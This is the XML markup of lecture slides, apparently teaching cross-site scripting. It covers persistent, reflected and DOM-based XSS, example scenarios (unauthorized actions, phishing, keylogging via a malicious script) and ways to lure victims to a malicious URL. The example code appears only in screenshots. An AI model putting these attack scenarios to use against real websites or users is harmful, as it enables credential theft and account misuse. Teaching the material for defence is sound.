          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6841067" y="2777067"/>
            <a:ext cx="466794" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7823198" y="4216400"/>
            <a:ext cx="466794" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5266267" y="3146399"/>
            <a:ext cx="1808197" cy="18658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6015002" y="4585732"/>
            <a:ext cx="1808196" cy="7990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996266" y="5503333"/>
            <a:ext cx="880533" cy="304800"/>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457200" y="86506"/>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Perform Unauthorized Activities - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22514515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09600" y="1540639"/>
            <a:ext cx="7298267" cy="4410626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="86506"/>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Perform Unauthorized Activities - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102682905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Phishing - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screenshot 2019-04-11 at 10.11.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825" y="1064683"/>
            <a:ext cx="7810500" cy="1968500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507067" y="2663256"/>
            <a:ext cx="7332133" cy="3802408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4010468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Keylogging - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screenshot 2019-04-11 at 10.14.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29506"/>
            <a:ext cx="7740650" cy="2717800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435632" y="4792133"/>
            <a:ext cx="8498916" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Keylogging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> functionalities are encoded in a JavaScript file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256964906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Keylogging - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4251979"/>
            <a:ext cx="4070345" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Calling the malicious script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screenshot 2019-04-11 at 10.26.2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775199"/>
            <a:ext cx="7861300" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screenshot 2019-04-11 at 10.14.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229506"/>
            <a:ext cx="7740650" cy="2717800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402764965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40267" y="2813073"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="6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i="1" dirty="0" smtClean="0"/>
              <a:t>If an attacker can use your website to execute arbitrary JavaScript in another user’s browser, the security of your website and its users has been compromised</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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In Summary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263706270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x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>Types of XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31014597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Types of XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Persistent XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the malicious script originates from the website’s database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the malicious script originates from the victim’s request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>DOM-based XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>the vulnerability is in the client-side code rather than the server-side code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13770119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x-none" b="1" dirty="0" smtClean="0"/>
              <a:t>Baseline Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138595069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Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1062562"/>
            <a:ext cx="9144000" cy="5186149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264748221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Persistent XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1062562"/>
            <a:ext cx="9144000" cy="5186149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277603688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Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1155700"/>
            <a:ext cx="9144000" cy="4528868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203552443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How can reflected XSS succeed?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304802" y="1391357"/>
            <a:ext cx="8686801" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>There are at least two common ways of causing a victim to launch a reflected XSS attack against himself:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>If the user targets a specific individual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, the attacker can send the malicious URL to the victim (using e-mail or instant messaging) and trick him/her to visit it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>If the user targets a large group of people</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, the attacker can publish a link to the malicious URL (e.g., on his own website or on a social network) and for example wait for visitors to click it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="6333816"/>
            <a:ext cx="2428870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://excess-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203552443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DOM-based XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="562189" y="1212573"/>
            <a:ext cx="8124619" cy="5188227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
